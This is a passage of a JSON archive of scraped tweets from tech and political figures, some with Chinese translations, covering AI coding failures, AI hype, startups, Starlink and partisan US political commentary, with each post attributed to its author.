environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00", + "source": "nitter", + "title_zh": "大部分企业AI战略已落后。不是因为选择了错误模型,而是仍停留在模型层面思考。真正的转变发生在更高维度——让AI具备推理、工具调用、环境记忆等系统能力。这种改变正比管理层意识到的更快。参考我与英伟达最新视频中的洞察..." + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00", + "source": "nitter", + "title_zh": "韩国机械材料研究院研发的形态转换轮让用户轮椅能攀爬楼梯征服任何地形 @spaceandtech_" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://nitter.net/cb_doge/status/2048744214230712500#m", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://nitter.net/KatieMiller/status/2048727747954868342#m", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence\nby @CyberRobooo\n \n#Robot #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m", + "published_at": "2026-04-27T11:20:17+00:00", + "source": "nitter", + "title_zh": "Skild Brain携手Jetson Thor赋能下一代#机器人智能 @CyberRobooo" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://nitter.net/jason_meister/status/2048720909809156378#m", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter", + "title_zh": "转推@GaryMarcus:顺便说句,民调软件已经崩溃!许多人的选票未显示,比如我这边一条也没有" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Coders and software engineers ONLY:", + "url": "https://nitter.net/GaryMarcus/status/2048544989769257024#m", + "published_at": "2026-04-26T23:29:20+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter", + "title_zh": "@elonmusk转推:🚨突发:我发现了Cole Allen的存档推文。他曾预测'卡玛拉赢下所有摇摆州',将特朗普胜选类比为'纳粹当选',随后转向Bluesky平台。令人不安的是,他在该平台转发了所有主流民主党人推文。警惕其转变根源:左派持续重复的激进言论" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "getting so much phishing email in my X DMs. \n\neither a lot of accounts have been hacked or someone has discovered a back door to posting DMs.", + "url": "https://nitter.net/GaryMarcus/status/2048500820350750905#m", + "published_at": "2026-04-26T20:33:49+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter", + "title_zh": "特朗普突然通过电子邮件解雇国家科学委员会全体24名成员,既无预警也无原因说明。该委员会自1950年成立以来一直存在,其成员均为大学和产业界的科学家、工程师,六年交错任期设计就是为了跨越总统任期" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If they’re willing to die to assassinate, imagine what they will do if they gain political power", + "url": "https://nitter.net/elonmusk/status/2048428921536868583#m", + "published_at": "2026-04-26T15:48:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter", + "title_zh": "现在是认真重新思考操作系统和用户界面设计方法的好时机。(同样适用于互联网:应建立一种既适合人类又适合代理的协议)" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed", + "url": "https://nitter.net/SpaceX/status/2048427420366324024#m", + "published_at": "2026-04-26T15:42:09+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter", + "title_zh": "'后AGI时代,无人将从事工作且经济将崩溃'。'我正在转为多阶段睡眠,因为代码中的GPT-5.5如此强大,难以忍受长时间睡眠错过工作机会'" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and 